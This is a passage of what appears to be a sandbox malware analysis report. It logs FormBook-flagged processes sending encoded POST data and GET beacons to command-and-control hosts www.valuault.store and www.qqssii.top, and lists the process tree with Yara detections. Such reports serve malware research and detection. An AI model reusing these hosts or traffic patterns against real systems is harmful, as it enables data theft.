ERYLmh=eN8YeZa+i+ntozCkTKvqJNihcBozuYncAVxscrk5KJeCdnnYVMCfRqQjwNUL0kSz9GDP4P8h2MekPzWcEOJ/BsngJOoerMQV+GzsCw2jdruukQthin1xfE2mLRlXYT62amwPwrTnSWPHSoRS9kh/nasV4cWNoHJLpRb3W8rK/63CBT78CZ5CY5600+08EM6Zcw==
Jan 10, 2025 19:53:48.544353962 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:53:48 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.11	49992	209.74.79.42	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:53:50.504903078 CET	770	OUT	POST /nhb9/ HTTP/1.1 Host: www.valuault.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: max-age=0 Connection: close Origin: http://www.valuault.store Referer: http://www.valuault.store/nhb9/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 65 4e 38 59 65 5a 61 2b 69 2b 6e 74 75 53 53 6b 49 70 33 71 4d 74 69 69 5a 42 6f 7a 68 34 6e 51 41 55 4e 73 63 70 4a 6b 4b 2f 4f 43 64 44 33 59 55 4e 43 66 51 71 51 6a 6c 39 55 4f 70 30 53 4f 39 47 50 48 34 4e 6f 68 32 4d 4b 6b 50 33 53 63 45 38 68 77 44 38 6e 69 47 75 6f 63 6c 73 51 56 2b 47 7a 73 43 78 58 32 64 71 47 75 6b 67 39 68 69 44 68 79 63 45 32 6c 4f 52 6c 58 54 7a 36 36 61 6d 78 67 77 76 4c 4a 53 55 6e 48 53 73 56 53 7a 51 4e 2b 74 61 74 63 33 38 58 62 35 58 51 6a 74 6a 32 57 58 2f 6e 4b 38 34 44 57 4e 31 32 6d 53 36 77 56 62 71 79 32 67 59 56 4d 4e 39 66 51 48 34 32 4e 4f 65 68 45 65 6a 6f 67 42 62 2b 46 36 47 72 5a 7a 4d 30 3d Data Ascii: ERYLmh=eN8YeZa+i+ntuSSkIp3qMtiiZBozh4nQAUNscpJkK/OCdD3YUNCfQqQjl9UOp0SO9GPH4Noh2MKkP3ScE8hwD8niGuoclsQV+GzsCxX2dqGukg9hiDhycE2lORlXTz66amxgwvLJSUnHSsVSzQN+tatc38Xb5XQjtj2WX/nK84DWN12mS6wVbqy2gYVMN9fQH42NOehEejogBb+F6GrZzM0=
Jan 10, 2025 19:53:51.111155033 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:53:51 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.11	49993	209.74.79.42	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:53:53.049382925 CET	1783	OUT	POST /nhb9/ HTTP/1.1 Host: www.valuault.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1235 Cache-Control: max-age=0 Connection: close Origin: http://www.valuault.store Referer: http://www.valuault.store/nhb9/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 65 4e 38 59 65 5a 61 2b 69 2b 6e 74 75 53 53 6b 49 70 33 71 4d 74 69 69 5a 42 6f 7a 68 34 6e 51 41 55 4e 73 63 70 4a 6b 4b 2f 47 43 63 78 2f 59 55 75 71 66 43 36 51 6a 35 74 55 50 70 30 53 66 39 43 6a 44 34 4e 56 65 32 50 79 6b 4a 6b 61 63 47 4e 68 77 4a 38 6e 69 45 75 6f 64 72 4d 51 36 2b 48 44 6f 43 77 37 32 64 71 47 75 6b 69 31 68 72 33 31 79 52 6b 32 6d 4c 52 6c 62 59 54 36 57 61 6d 34 58 77 76 66 33 53 6c 48 48 54 49 78 53 78 6c 68 2b 33 61 74 53 30 38 58 54 35 58 73 38 74 6a 71 38 58 38 37 6b 38 37 54 57 4f 6b 43 6c 44 4a 74 43 4a 63 4b 2f 30 5a 35 62 43 2f 66 55 41 36 75 5a 48 4f 4e 48 4e 31 56 38 44 35 58 55 75 44 33 34 6c 4d 58 7a 72 77 64 31 51 48 64 34 73 48 38 69 2f 57 50 79 4a 30 4d 61 66 49 39 73 46 75 49 6b 70 39 4b 69 39 6f 45 63 6f 31 4f 4b 54 68 68 6e 69 34 62 57 43 45 76 52 58 46 30 38 41 51 59 2f 4b 4b 54 55 31 57 35 75 55 4e 79 46 78 59 6e 37 72 44 4d 50 54 7a 36 32 34 63 50 65 51 50 34 47 71 36 4e 51 65 6e 61 6e 57 64 2f 78 63 61 57 39 70 2b 6d 72 32 37 2b [TRUNCATED] Data Ascii: ERYLmh=eN8YeZa+i+ntuSSkIp3qMtiiZBozh4nQAUNscpJkK/GCcx/YUuqfC6Qj5tUPp0Sf9CjD4NVe2PykJkacGNhwJ8niEuodrMQ6+HDoCw72dqGuki1hr31yRk2mLRlbYT6Wam4Xwvf3SlHHTIxSxlh+3atS08XT5Xs8tjq8X87k87TWOkClDJtCJcK/0Z5bC/fUA6uZHONHN1V8D5XUuD34lMXzrwd1QHd4sH8i/WPyJ0MafI9sFuIkp9Ki9oEco1OKThhni4bWCEvRXF08AQY/KKTU1W5uUNyFxYn7rDMPTz624cPeQP4Gq6NQenanWd/xcaW9p+mr27+khgrFl+G/Rh9U+8ycm637ekxXb2rhodORQBPV9VOx/7/crmyM1pudQcTjCgEJc0DFYR12UvaxbidCSczCo3o+EgxgFZ5Fac3HYQ+6nVhYpJb+CThYwuSoroGMChuQy5QjpixSWhuA8Xbah+DhqCAlOsr9CG8sOgdOOFufP01VrgVDvW6aIkJLh0qaT8mvcO28egCFTVDLaoaQtMYaS/X4AsH1fHmaPYsi3/tS3DSdHnsnIEkekAPLySRiqUxl9MODWzMUlnhEk7m7j1Xyhy6redrJ8buwRS7UfcN4MDNAo3EOWBqUeb0m9ONfOVYDXXsQwa3cHSh6RwMSX0sz2L6Mfw+RxovYk/kvTC9+WzFVOjQrII5d6FWsmuvkeU5iB+W/bQrc4MnHX9f6tQuG5jElslvb6AaYarvUJWCSXoQpjP5AXHMwleK7z3R0/IgkggNrhvsaJgr1FiPFp7KlAqBsAGmOzzJKCMfVTcEY0dyD61s8+oo1zmfAt6gyK+KJgjR/rc9rzz4OwRTtzWeOSGByliiZPXllI2tWagh0bIbXEqfGUhgpnJSWAOy7//If0DK3qb0ANiIqfqztu7sP6f2ua4VP1cXaP8BSPxNqfIyT/J5deG5ybczz+Z7ExoAoAAmQIZpN8wbLqH/Xz3Eerw7F0P1e+thDRhhrt [TRUNCATED]
Jan 10, 2025 19:53:53.620654106 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:53:53 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.11	49994	209.74.79.42	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:53:55.683648109 CET	476	OUT	GET /nhb9/?ERYLmh=TPU4dumIi+D1nx6dGJD9W6GSZGJOmofRCRQtffc6GrD6UQOtZPepFdRZleg/11G771jgytlZx/KAXkWBKMhiDPCXANULjdgkxwmOOUHyZqikvDogiQcXSnY=&X6H8=IvQt7 HTTP/1.1 Host: www.valuault.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Jan 10, 2025 19:53:57.032109976 CET	548	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:53:56 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.11	49995	198.2.214.227	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:54:02.834877968 CET	738	OUT	POST /2x3i/ HTTP/1.1 Host: www.qqssii.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: max-age=0 Connection: close Origin: http://www.qqssii.top Referer: http://www.qqssii.top/2x3i/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 6c 78 6c 51 34 37 47 4e 7a 6c 4c 64 34 2b 48 54 47 75 35 37 63 71 57 33 6d 51 4b 63 6b 5a 51 68 4e 6a 34 67 6e 57 51 36 38 50 4f 6d 79 5a 67 71 62 4e 46 5a 48 63 75 59 69 30 68 30 4c 39 7a 6e 73 49 67 66 4f 58 73 56 46 78 77 49 36 65 75 58 70 35 6f 34 41 64 77 5a 56 41 36 62 34 58 47 39 77 5a 72 44 74 4b 70 7a 36 52 66 42 47 74 75 6a 61 44 45 62 71 59 70 36 61 38 6d 38 48 67 59 36 48 71 33 65 72 43 6b 52 54 43 68 59 65 31 47 41 73 61 47 4f 4d 71 38 45 35 49 76 6d 53 75 2b 33 62 32 50 42 48 52 6e 76 70 44 43 32 4e 58 49 31 6a 46 55 73 39 4e 53 51 59 6a 5a 48 77 2f 31 6a 59 77 3d 3d Data Ascii: ERYLmh=lxlQ47GNzlLd4+HTGu57cqW3mQKckZQhNj4gnWQ68POmyZgqbNFZHcuYi0h0L9znsIgfOXsVFxwI6euXp5o4AdwZVA6b4XG9wZrDtKpz6RfBGtujaDEbqYp6a8m8HgY6Hq3erCkRTChYe1GAsaGOMq8E5IvmSu+3b2PBHRnvpDC2NXI1jFUs9NSQYjZHw/1jYw==
Jan 10, 2025 19:54:03.930929899 CET	146	IN	HTTP/1.1 404 Not Found Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Fri, 10 Jan 2025 18:54:02 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.11	49996	198.2.214.227	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:54:05.396258116 CET	758	OUT	POST /2x3i/ HTTP/1.1 Host: www.qqssii.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: max-age=0 Connection: close Origin: http://www.qqssii.top Referer: http://www.qqssii.top/2x3i/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 6c 78 6c 51 34 37 47 4e 7a 6c 4c 64 34 65 58 54 57 39 52 37 56 71 57 30 36 41 4b 63 72 35 52 6f 4e 6a 30 67 6e 58 55 71 38 36 6d 6d 79 37 6f 71 61 49 78 5a 47 63 75 59 74 55 67 66 57 74 79 6c 73 49 6b 58 4f 57 51 56 46 78 30 49 36 66 65 58 70 4b 41 2f 42 4e 77 66 41 77 36 46 38 58 47 39 77 5a 72 44 74 4b 39 56 36 52 48 42 48 64 2b 6a 61 6e 77 55 30 49 70 39 54 63 6d 38 51 77 59 2b 48 71 33 67 72 47 46 4d 54 41 70 59 65 31 57 41 73 4c 47 52 5a 61 38 43 30 6f 75 6a 57 4f 62 73 56 45 53 74 42 77 37 59 76 58 65 76 42 78 46 76 7a 6d 64 37 2b 65 61 53 4d 46 34 33 35 4f 51 71 44 34 34 79 2f 67 2b 51 75 68 4a 54 76 61 45 69 70 79 32 75 75 4a 77 3d Data Ascii: ERYLmh=lxlQ47GNzlLd4eXTW9R7VqW06AKcr5RoNj0gnXUq86mmy7oqaIxZGcuYtUgfWtylsIkXOWQVFx0I6feXpKA/BNwfAw6F8XG9wZrDtK9V6RHBHd+janwU0Ip9Tcm8QwY+Hq3grGFMTApYe1WAsLGRZa8C0oujWObsVEStBw7YvXevBxFvzmd7+eaSMF435OQqD44y/g+QuhJTvaEipy2uuJw=
Jan 10, 2025 19:54:05.948124886 CET	146	IN	HTTP/1.1 404 Not Found Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Fri, 10 Jan 2025 18:54:04 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.11	49997	198.2.214.227	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:54:07.947902918 CET	1771	OUT	POST /2x3i/ HTTP/1.1 Host: www.qqssii.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1235 Cache-Control: max-age=0 Connection: close Origin: http://www.qqssii.top Referer: http://www.qqssii.top/2x3i/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 6c 78 6c 51 34 37 47 4e 7a 6c 4c 64 34 65 58 54 57 39 52 37 56 71 57 30 36 41 4b 63 72 35 52 6f 4e 6a 30 67 6e 58 55 71 38 36 2b 6d 7a 4a 51 71 59 76 74 5a 46 63 75 59 6b 30 68 34 57 74 7a 39 73 4f 4d 70 4f 57 64 75 46 7a 63 49 38 35 4b 58 72 37 41 2f 50 4e 77 66 43 77 36 59 34 58 47 6f 77 5a 37 48 74 4b 74 56 36 52 48 42 48 66 32 6a 4b 6a 45 55 32 49 70 36 61 38 6d 77 48 67 59 47 48 75 6a 76 72 47 42 63 50 68 4a 59 51 78 4b 41 2f 4a 75 52 62 36 38 41 36 49 75 46 57 4f 6e 4a 56 45 4f 58 42 78 2f 6d 76 51 36 76 43 46 63 32 75 56 67 34 67 34 69 75 62 6d 51 6f 6b 63 55 36 45 36 4d 7a 34 54 53 48 34 52 42 31 70 66 73 76 39 33 61 71 74 50 55 4b 46 6d 4e 67 64 38 30 4f 6c 6e 44 6b 67 32 73 53 31 74 70 35 4f 69 52 64 5a 66 7a 4b 2b 49 4d 53 50 48 4c 59 79 69 5a 53 2f 76 44 30 49 61 30 72 32 32 6c 36 58 79 4b 61 51 2f 49 49 36 69 49 45 6b 4a 30 4c 73 4b 67 66 41 53 57 57 51 79 31 4d 4d 48 74 44 6f 31 77 51 79 70 76 55 4a 68 35 4e 32 67 64 71 63 41 76 66 4d 4e 43 7a 64 35 66 77 51 48 64 [TRUNCATED] Data Ascii: ERYLmh=lxlQ47GNzlLd4eXTW9R7VqW06AKcr5RoNj0gnXUq86+mzJQqYvtZFcuYk0h4Wtz9sOMpOWduFzcI85KXr7A/PNwfCw6Y4XGowZ7HtKtV6RHBHf2jKjEU2Ip6a8mwHgYGHujvrGBcPhJYQxKA/JuRb68A6IuFWOnJVEOXBx/mvQ6vCFc2uVg4g4iubmQokcU6E6Mz4TSH4RB1pfsv93aqtPUKFmNgd80OlnDkg2sS1tp5OiRdZfzK+IMSPHLYyiZS/vD0Ia0r22l6XyKaQ/II6iIEkJ0LsKgfASWWQy1MMHtDo1wQypvUJh5N2gdqcAvfMNCzd5fwQHdmgo3zQYgsNp6nSqXXltaWxUEZJqFPP8Bdk3kxK8fPhmC+IyOnPPzkPwxA36DhPOGIpARS1BWO8p5p8oq+Cfd7ZQ2PeZHl9X06usG6GW1VjvNn4gG7lrdoatupGYcjGw8YMePtkp2vGR5cAzzjj3NOS8i3AYNUuJG+UMl80Eyqo+q+7fnDYHnR9RVkKj0H031U1ZfTBQxJt5EK+NzOxdnMEU2wy+624A/hjVIObra2I3H/GiRPq/KLjG1MPpaKOdRO/dBgb9LI3TKlEyfI0d2WbsxwRw3Zjznji6Ngm6DTOpTbPQNjsHC/x34+EB42wIvrzEU3JX041KNNvrPBKaUmJADG35CuSsO/ZKdHGYV+bvzY2UmluPtklROPuwluBOhtefEZaKRKgmzNBlWyQ/JHHeuTxTzYn9MEr0Mc7vX6YENaOKEJGv+fxy6QUw0ZONIN/8XbGYqvX/32f3+2wFRyqB/KS4U8wpKvgUVlVYu6xlE69tz81g6g5sYUlPvAcaQ7A2vd9MbkHffRm0pNcHL0ZGhaRsI/oI0vEnDB2Wtmfjy1hRwpgaODaUEEE+WNyke+96jmQAR3IDyMLULsz7eNjMVl87runONo+gKLwEMlBABsAxToH/w3BImme4kZwN+y5WT9dhxeh5U8Je9ZvOv+pSWYwkCf5qqmL [TRUNCATED]
Jan 10, 2025 19:54:08.533895969 CET	146	IN	HTTP/1.1 404 Not Found Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Fri, 10 Jan 2025 18:54:07 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.11	49998	198.2.214.227	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:54:10.495913982 CET	472	OUT	GET /2x3i/?ERYLmh=ozNw7NS3nEOk5LjjCOldIIGkyQfls/9HGmRhrjNi7rrUwaxJWNlgSsqd820yKv/9if09QmpvaDID9eWOlIIxCNIrEjeF8HSt0uqtuoAuwQX7Per/XEdcwbY=&X6H8=IvQt7 HTTP/1.1 Host: www.qqssii.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Jan 10, 2025 19:54:11.097788095 CET	146	IN	HTTP/1.1 404 Not Found Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Fri, 10 Jan 2025 18:54:09 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	13:51:17
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\J1VpshZJfm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\J1VpshZJfm.exe"
Imagebase:	0xe90000
File size:	1'276'928 bytes
MD5 hash:	21E2A1F6597267E8BBDA9239986A5DF4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:51:18
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\J1VpshZJfm.exe"
Imagebase:	0x620000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1845812137.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1851615513.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1852595076.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:51:35
Start date:	10/01/2025
Path:	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe"
Imagebase:	0x6f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
